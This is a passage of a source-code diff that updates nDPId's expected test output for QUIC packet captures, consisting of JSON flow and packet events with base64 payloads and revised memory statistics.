-00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1616775370814,"flow_last_seen":1616775370828,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3750,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1616775370828,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1616775370814,"flow_last_seen":1616775370828,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3750,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1616775370828,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":3750,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1616775370828} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 
@@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5894473 bytes -~~ total memory freed........: 5894473 bytes -~~ total allocations/frees...: 118160/118160 +~~ total memory allocated....: 6028107 bytes +~~ total memory freed........: 6028107 bytes +~~ total allocations/frees...: 120922/120922 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 491 chars ~~ json string max len.......: 2186 chars diff --git a/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out b/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out index 12a35ce75..1f383fed1 100644 --- a/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out +++ b/test/results/quic_frags_ch_out_of_order_same_packet_craziness.pcapng.out 
@@ -2,527 +2,527 @@ 00590{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1621417111064} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621417111064,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417111064,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTFAAH4RUm+FzUvm0OWdUdzQAbsFTtRayv8AAB0IRl3KXBW\/LTsAAEU0Yy4h2W7s\/rlLefIGYQnrzU1ux8x1WHF9P2TRMM\/uMgrk1ok5ld99474sHzCIsmBaABMBQuwajfiOypF13LdOvUbny6sKbnPsiQnWdRy34WzYDIUSWbFA\/\/FyZAuWdhVQrY6b6y6LN19n0\/TyiwQZaRgOj9Dah0V5ZEaARpJrDY9m+9WAWL1E5fl0AZB5oVrpfRpwU+72dTHjTrdezZLrG0y4LUZJV4ZFSW\/bOTNeyiYeeLzss7MCM0o7kz\/ABmlsvSTXlJ31WdTvcFfKZa+Ers7MX6vrMreYIDLD\/ts+djqt3oepBEPH1tJwybSyF6zOUmcUZSNjRN66q7NkOjxIFsUfL6vSIfs09kF5zqgt+spL3nfMkmEEbIE7Yb6VRa8aqO8bYrkMWyfbFbPBKBEuDwvxXHrKHBxwnW70rIsunEzXSGSfZXttskCHI36aQkPEEfMaooCWLD7F3ek7vQfYF9UBeP3UInD1\/fYOKKyXlh8f1Xhf5ZtTg\/t0H\/rYsiKjt\/tbN+4cOfHmb\/PbJuLAirrGtMROug44tuDQNDgTnWYAQeXIGrimS63+Je1xn8is8IMmIBVJgnKtBWcrkpMXG4qIednOh1PU3Q9\/9otFQnmPpsVeluBrkhgnE4Pv+jN7MB9MKsGF0sSC1rOxFEUDC1ZncrKF2pLDQgCdTsCDk\/CcchJ4M3KHS9yCURHTTnwtZtZ46Ba107K6\/C+vDHLLH0Agtie1px7EDwsBP1SFcU808ARQb8bGLCOen2251sgfs22LC0YsewZOMJW3COsMT7VTAQC4PFSt3Jgg155O5SMOBejKszFjP0ssLTQ45nlMeghvKmzI+zfNFO+kmZxhFyxqPlrgdV4WKrdIRZR4IDXMiiBpWoClkuM9Kcm+TctK8hPDBFox7OqpdBdHkgRVzggkNVEFUCJAoy7stynIye5G\/c0PO6aK2KvGAn+3yIbnJQO+GFl+DzzTQ5+znvJKlrrHbZJ0Q4s6V8EP7sXEgs1jrGqyCGI9wXbSo\/8wFamlp4ouFVhBqYZQ6GonLwcM2BL2EqcW1GrumcxSrpctIQbM+MLM5TmZnDMpdMZpkkzZ2HiMH1e4fDgQ6yg7Gbq1oSAP7PmPqOdaH3pXDqIE+0KyN656ZdaYb0ZW5qVxVZ\/yglBSCDTTcv+oiZZdzI4cH8Dg9AnTIhGYs97IARnzPncHqS984seVJsVe3QFzlkq7PW\/+y877P\/bFA\/sin28uLWX7d3K3IUeguTPHXWFnBk90vEPoVwUYyj9ACpdxWLYAzshM8UJ\/W4931weL+9Y45JP53CAvIUGXcyWPEbA\/HUlyizs+gfbouzc6njtiCnSFNiKixMnDd6GnBIki\/6nDKciwxPCTmggZDjKRSkhR0fon1nZO04Oy+GPjSKqyuI6I5+\/qz+87W8lrtdNnV1MTgqqBXXhQGkloYjiOOO7Hr2euMPx\/D8ZUBmzjEl
1Q0vybg5VizAcIFEitV672m9tByJnZVCmqOqHSsQyStHmvXtcHwG3FmgKLlqDELNJ8refw1BcltymiFpTUHXujIq2m\/2R5lxEp3IZpg0ykJqHmAP8x1DQP1O+gpnkeZMlBn7sZgxbS5i464ONO4aidSpGEEs44YdZy\/0PLNXvbgohSN7NSSlu\/3OBSZTCjfEOkPRu9fd3b98IylU4SIOzNDcculUBKrCHb5iJqK3HKWlgukxdQQwzwn9S7alNQY70dsl9vUF76RPML6stNu2Zb+\/ZYxqaJZFu3FOvrYcXEYKZuXML8FedF"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417111064,"flow_last_seen":1621417111064,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417111064,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621417111365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417111365,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTpAAH4RUmaFzUvm0OWdUdzQAbsFTjvyyv8AAB0IRl3KXBW\/LTsAAEU0xBtknC+XTdZGN6290CAoRKHgbmKFJg3HBwc\/jHUJwoDaxdFeYCE0Uygz+VHs0HUnI94AbjhHMzRan2kJrzGOLsIFVrtNzL4OkTEDJq3UUrfyDciR9qccsfqQIGKe4+mov72jtae6dT46hkQ+QTnI3qa9w4Yrz4KUlPgfO9zVCT6mXSXTofwnKS6Qfdj9S7TH8yQuxrRDtFQWnhTNy0t1UKhz6qr7HZc7OXUxuEatCLs0GM7RQ5XDRBXA5afG92SX13U42sqpyR2Dqucjmfwt+AZJqZxKZ88XCAoPiBg1nhBBqlcLQi5b55SXRrj8J15Ch8Ci4CxPCOPzc3h\/5D7UZhbpjLoo2\/wZisT7R7KxaJ3ST2sZ3au5Hx19NvbHrwwXFyjsVWmpBliZAZ1eg8gxdq7r40u+8bSjNep5S5X4zhf+AkNuV8jevuxbg\/UwlzjTe8n2vKNO4Sn8ezT9DiH9wVxoqUgUC56J5Bw\/YU9h0I7kitWH4Ge0BODww29+Aa48fFyudGGRJr0yq65POy0\/nSLbvLGqwZp1zhAkIqUsP2zPPDhVLcbkKuUbzbLDncwcQqWbszMpdX6XQMob8NEqfarZfUbWlLQzVqNQ8t+rVuxO6E0Y5ROaqgvU6Iaw65vnffX4bnfiGXYqsNiOtVcC0AGzgdFbgZHuv2Nb7kc0byRUKspz09Wn9zWhuGfrICjWmqrB8Q4VPqUOIqhoqXlkGkHNbJf58PajF6nNTpLrSKS\/s7\/PAyhgL493GmYSfIy9P3KtC5vS4Ku0zGWvDo8SCxhl8hUKOnlaSGpXqSRi3sgHur0sAZSPpYHgQ9ljywBydFstLrd5zZwAxQ9+vV2dyvl5E10qbt3utWTyQBXOGM8+cRbZ3IceK6X8lmEcVSe\/lGIY3L8lM0BH4NVdxflARe5x27az2293PuYiWrepjLgL\/t8GJnVIEAfdEDDv6nlOl6fweFWTAviNX0n7H23ADHXDBJoQegMO44JmGpnPyeZ7peOilpkbWx9ATq+r0mZxbasRl34cc\/qUozcfhHeRKRw+hYpaT9CQZ8AwobPmbBbge1PnLbS9EJ6KIdeNM1xvj5qNQCPpdp21psJ3+wuxB5WdrC5cRGmW+pfRGXkJSm\/Hxm9DB2tYY3zfLjAKMpqTNWMC4tSeo7z0jU4yjg\/Y6fR198VAyclvSR0O5TVO1oliLvxo8sV\/3pO0ZQdkjztGQDklMECKRLmGHWeq07ToUjA7\/u
q\/1q1ZaVKO9+hzMdiy8RW\/albPHuZmkMcv\/hdmGmUKrlNaBelZYm3JHfkOkgTs5ncd6giTGx3+gp+77n0Cl2X\/UMETVoN6eJC2aNdjH04XtPXdO1zEfHQdKIZ6vLfMBFcb6lyyBQHYpxqMpjOmWiEaBu7NBDgbODnVf+Tvq7iqc5vUfezJABJgNs+wQkFHvjcnsWbt8hd4lnshRnhfEICGBWv6UJsU9Ov4RS1eWGN6u+WJZ1KqUjcUa+wjrhijbGsQMvjESucpeFe9xpKA8HAlnPSJl2ONIdzQBHu\/3yzS9u2h1V7df8T\/i8Gdlu6HB93T89Yjw6chn7zm7z2FtGgcebdYl7BpQRSNjPJz84wtrOqzP5VkldxWGcJvvM9JiOiFsmosV0YXCCuN0S1I3GD34RZxvxyg8ZUjvsqRi2E\/iDILq6\/FEFNEDKUPx45Bzam\/QoSbKhlDZxaUjzLpRLnCd58YA3T6qMB7hBeBBV7m2MJBvTY86h+TNrfUyh9Qv4iQnqyGKkFDZSiO1ApSSgUS"} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621417111974,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417111974,"pkt":"AAAAAAAAAAQA4++7CABFAAViZTtAAH4RUmWFzUvm0OWdUdzQAbsFTm5izf8AAB0IRl3KXBW\/LTsAAEU0CaUDKN+7HQerWxWNaxYxCvRcfnKOO+ybfMRaHlMyLV5\/ifvLi6NsRKmbKUNcCUu\/u\/M1kQX89iC1g71EFL9hpQHjoogBRK6XO2cU5STf5N9JHAk+8BPn45mxnB29aiUjdM+EAfIXepdjDNQjKc09rze1a+uHtprZ5+Ycrj2s1oiuYYUb9FANNRaKrpCGh8Q1rnRYx770sBfzPHCd4rH7ygHAqZA9rzQXUKNYFjXghCcBZatYZ9Q8JwAA\/fKY3\/lIAOVtIUm1GWVWJWRArYGxBCEQZpeN5QPlw8cLblO\/3AfsaykEWbI69jFCOGB2jUptGYOGveg\/lWTYc3h8ky83fW8GcKmxAdv74r3jjdjUEQwR+OklxSw8nZmJJz7vOIvvqHsGajXpc6slDSCi8t109u4JP5JW8jD8wB8Wu2rMNkpmGllvnJajJlPlmNcv1t63eJQ7tGt9eGqHfIOgL9TpzURHNTm6hgSstuIpgK9L38bDpiposW3bHdNdiSGW8YfcnS01KCB9zAXNkqgfNlW+GnajZiezd1EJNTKChMtZV3oLfDVU9cARvR9xtldNProWOwXOZYPAYtfMb\/io\/Vu5CAxNRhauAQj5iV37FvKMgojNtwe3JiavKcD\/FRmXzVU\/VpRWC0bmuCqHRqGUFP1t+DceGKbtne8WNVu\/xmWJrd890soACDHC3pcknd\/nHK1UlwSNkQ8SpuBtv6Dp3ZFRJdsGRDvauS+NTENiJpqioBeQmjGdksZRA0\/zyeeZ2tToLKwCsABDpjD3wQPTSgs\/QdPv\/A5+SuOjcGiYVuktFgslT0Wy1tyms3TA36Wcl6ZEPkQlM\/omx0Cr54NreGjEi+Vm5kYjmT2fnBvf2AQ12Dg9A+pCWtWa4LMGgtYYMDVRRT6vqKnhbVtxxQSAh\/MWBMyqiQHkkkf\/
vXhJ\/dOU8N1Fd1mO1KBRln61my9oJczDOwipHZPAlr14xAsdkdGB\/+HZ8ppEuJtqtkEtcOw9xjC5dCPbakUtfuaLzDo4DHXPrpt\/f+rpZlU81EBxJG0afG0vQOyE3ZuYMlkM4IVgPqMx+uzy+sK+2o1w+yZCywDlXOysJF2R8BE\/KVLZRpL6uxsfUOFnHV4VQFOd3VwykNOtm7wpKwJ8ySG1VrRqSLuw3SlZ8dJXFZ8gIUVHRRjp13ey\/kua7zLPrAEFz2vf1ZYTZ5m6U9KeweZA3wPOuih84JbuHHl9vlsWDb7s9qrasejaGIRTS0yaEkKOXG2aXkwOTKzHvuE0KuunSsQcA3e6JAQXrlvgeRH7cNh8q5Noilga8Iz99iaZ+tph0kvufCI2CHlp41du7sNXnyC2d8RZPQAJe7D4Oh1BQLIpaX6IjRHr6Znht5L0l2uxz2PQHcoUX6n4t3dcGi25AwHjP5I3uYq5MEBsM+ufza0eSWH\/9ZccO0cIAXaM\/ZK7yJ7h18lQa\/XrC6T0H+iG6YLcBs+Nn\/WpfxO0X+Fm0xBv3kc6fJmlJHPrTgM+FCizZiybSl6ku\/j60rHDQ06vpIkk9ZS53KSJzAVvHcMEw4RS9GGhlSYAJux\/nZp6xaRxVAmLGayjkrZg4JqrAaYLUFPZxCYnoaoOUed39DfjyYIGdVO+lFtX93fPnuewUpoX+KmbQlR7Ka10pukI4fioRBdFHiEB\/Gn89KrwhW6ASA0p9Q0Oc5cBfAuigzZZU2MmQFjJi2zpQVTe\/5PEXmeSFsWQCTH3gUt8UDEky7qzZgA+xFi531EMe\/QX6lWUAbOhV9FlVkAVMO+3"} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621417628801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417628801,"pkt":"AAAAAAAAAAQApuCjCABFAAViWsBAAH4RzreTxFoqsVYuzvDPAbsFTkiRwv8AAB0I+raMAglwITcAAEU0GmovP+mvsihl\/92QhcJt6i9xOCuhIR8v+QVQPDfpj6BytKt4QkFnLk36FAbt80sJIp\/Y2c7pKVYoBF6gfeinYt9EQsJeq7ROnY3ivJapj2oaHwAzsZa4wHPnbSp5Fzk6+XETr+Q0x6NnHbM3zNCM2AaHMspi1VAViZWQsrRPrT26HUJgBdgrtSBr704DAlp8NIBOTaYQmRsLw0sO8kaVUQSTjBt91sODuXuJFBlvmd0rw7Lx9XhhtXOEq8peMATmMSiGkCnVtuHU9IHl7xPdTUKOwX+iqBEfcVUDuMTWTQ+xEjmygydvmbpLt++lwihva2qbwF6QkkfAhzI1WNSSRrlwUFqM+Zsvtnl9miygOu3MVINYanFJshDLLhtcYcppiQUtPQh8neggpYf3NcqHcOg9yFih0GlvYXJgOAi0eylABT+cl7jZZQ2\/9NICqkeHp5SgtJZ+rnT0jfRUKImzpisiXxL0gUjRhZOBaNVTw2DFuXCxQsKg\/KU7zvbCtbjOLcFIvgcvLg+YOzho2mATZS9Qfa20oAzRIDxCf0U\/g2Kp\/RjvwWjL8Qf3VcFus3W9PJibs38Cnb8fC1OmRScNRTKV7pwvzBngo0k14tTrnFD06xzFU4K0vUGZStljl\/FAwNVIMnRWjsQn89AVyrUyoiyAS9a+w+Ol\/IuzeZupo9JHvpafoLvt9p341rnuNTMpuiggzG1a\/AJiehCdHVju6FHVk25Y\/MvQwUZ0i\/jES6yQR38oUqlnXVrq+fKrSE\/9kcUPuinfPVwCAVdLSD\/ha7TenkHZGDajCF77P2QxcTnluKJdVrDlQTARcyFrPTPqYJkQ\/NBO4Q2LUqkPKdSNg8BTKf9ErnqfzfLyF5WoMGjiT+xKiXVVojRktrJCp1vh\/UQZ5GB7zhzqnM6KrzPyc3Lxp3Bb7qVApnsRGOqMr1ngaD2S5zZ2FCX87pAvyMSivW4aYtM\/FgZ5fi1KOfYRKUUTVabBR4V0TSKE6XBOLGcK6tn4xBlT4YzAm4R1HLGrMHJVUw1kbq8I1GPUl2Oe80wpsoTflQ\/7rxCHFRENvTpUYufeWaZVYdHvgsMahyyxgCBnT2nc01NamKM3ocOAfaIGcBY\/TLk5FbdJIlfNuzsvYmFgqC9vpu4ElbzDnAVfSEDcO9fSa+\/JxpgCfB9tsQNpFDTYAu1e0Ss3GB+O8aZWjtRVkhzocpK8euQFsHuPNYkc0XzFUPsLBkPlcmTbK4YVnrIapDZ744rfE93ooFZIUkO7Ch8oLzqK0OtBOsGmVGFTbaVf+NhQknLLOENbTcHT7F0rxbWFDU++4qTR\/XmfJ+wUTJsT+\/quj3VddN9kLF9L9a4EgHNqz15osfhMQWW+l0C3k2t5fh5I4ZCw28kLSE6kXpe3jSgb7PvPC1LSkSgWYuXB89Kj+qTD\/cFbalGxIJb\/WgzJZn6Gd7R+R9Uf44YjcRfaKor1OTqri0m
pCgDnlcKZQFUkScXWdMFAepcOEwVDvTUtXG4T0tMPM\/db0x58pCBeZHjWa7wiz\/JWqOATbNaNGCr6YxqPK79sl3n3mgQubt+x0eKINEGpxaZgah4UluP1BWQh4YfISLcQeFbuVb8GjyINELyA1nqZY4Rm0zHf5sR3fkBxRXy8m7315bG8d2eGbZxchn62uWz60SggwIYaJ0ECuYBFMzQZtKNYAvyGaZftALbKhVzxh7mgcomFyIRc7XwzM56SXrPBzXgho48l4M8VVXrs3DqFKC1\/kSw7iV2kg2+Vlrpf6i2uga0t"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"sb-ssl.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621417628801,"flow_last_seen":1621417628801,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417628801,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"sb-ssl.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621417628930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417628930,"pkt":"AAAAAAAAAAQApuCjCABFAAViWsRAAH4RzrOTxFoqsVYuzvDPAbsFTm8Jwf8AAB0I+raMAglwITcAAEU0pjC69lxL17I2Vm\/2Q1yiyTryhXfWfRIufhNP5rg4c+FEuOp6GqQUQFPIcqWk6U0BDlkVmnmwl9dIFWmX\/bKzitGvZ8mfDi9hktZWexq37TSuAH96QNRoeDy4tvPiSgKIr6FZgR4Q\/HVISWRrxFL0ZKD38sgIoVYjPEx\/9Ic4WOpPiBg1t9\/qrhQHH9cTVMgWsLt0TDJTL0KZv3cMnUOIyDfZegNZ4jvz12dVBYTIdmKO7+1d6Z2\/OF7H8egyUhxpPD8g63YnzjMgsOVESGTopFXkRNnrC5YYuCPBc4+8zyPzWbaRA7ZY7Dj7GHebUIt0h3Gw1DMiRq+wjLGQycx78BHNpTa91SU5Z8OasixP0ARhcYJ7QKV8jqRLQIZ4IpBhgMNdrO8Ggn4V1al1n25AZ\/Lyk1mcCfIi5OinaMRv84l92mkzRek7AiZLH1nKN7U8\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\/Knz7OtExuPugeU8Zt\/GlPfZScOWlEiLrc05jYYCgWUXmqy179xmcMucA9Wtytp06aBHf+WfQ1fURy3jSmQ3NJ3gv81uQ5roWC\/f151I1SnpAuoNl\/wshFDWrHEG7wosMoA69VM5ioRjUH6Vw6vtLsEkJmdXHbiLelXmCeiv5o5cjuB7D+CLbcHnxi6S1s4ouqpxdZyMBB3jywu2tIYU4QKiN+fjaYMDYwpAzD5Jb2Fn5An8ebr2twQ9IO7dHcApVPzom1G8qYIs37w2OByHgFyhjSn3envhKGKlaF+DnxPnqjkcDSypaV6Xw6EsGbkUEBsPWaFNAQl0rYQv4OIQSLLLDbtnqJSJtFqJvApbEkL5FOujphAtNX4TvOYetM3s\/ZH5TkEvzT+bgZWz2mB1oMOoQPy213DWxLIhN9Sus3pIVPH9KUpLVArxCusIojjl4y\/CVvWA5XX0iWrENm1HaA6F521QuNa+s5DzOv42QgWOr+s5uNKSTFxAahQlQrNplOZsHircGL1XR+n2uD2gTgWAAY3b2i21J5cYoe0Z\/jVWlplRHgm1fBm8iBceAe+i8eGjb4bPc5PfJZ8n+JrHrN8SDylfFnIiRNE8ID8KN8lkbNu3\/oS3Kih\/K85WFq55fup233gxsGiJl3pqoHcF8IRFeJ07vNzBh1QaRlhGdke5sCCm3DG3xbt+UWW7rCkqr05j2zGYZdejMwOKkfbRf6NbqQKPeIcLIlv2bkyG
3CDxjjE97A5SRMMjRaI2D9gkNO0\/wn3W0x5srM6qZB5BFLM7YG15trX9AF3w"} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621417629532,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417629532,"pkt":"AAAAAAAAAAQApuCjCABFAAViWtRAAH4RzqOTxFoqsVYuzvDPAbsFTrDqwv8AAB0I+raMAglwITcAAEU097Xe2il2Zegu7U45BZ8gKfm75BdOnPJC97WfnE5KscE98sHvgzGhWttrfuN5Zw6V0RznV0lHr8X6WifmddIwLz9dgmQayfKTYym3Ekq7+FTfsVbmdLv7iDTySVEQT3U6aJZTVVfr48rzDdUlbuOabtPNfF9PK4wxRo28Hv8rNIeQLcDYX1ZhINEmN+sLvvHwjXJJn\/mGzxs37Wo7yOZbGkbY30QHlElqBOAjfC6VA27GzLEtJY\/bgqKUM6kS54RZZNzg5pKpLNlhxgP248e2xlGMNOmp4fMFXgmg3E